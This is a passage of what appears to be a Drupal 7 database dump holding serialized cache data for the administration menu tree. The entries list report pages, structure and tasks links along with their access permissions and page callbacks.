logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:260;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"260\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:352;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"352\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"352\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:353;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"353\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"353\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:354;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"354\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"354\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:355;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"355\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"355\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:358;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"358\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"358\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659098,1),('links:management:tree-data:en:f8e81a5a7287db209346d12b15c39606c4a4b15b306f634bf51f5cfba035b4d0','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"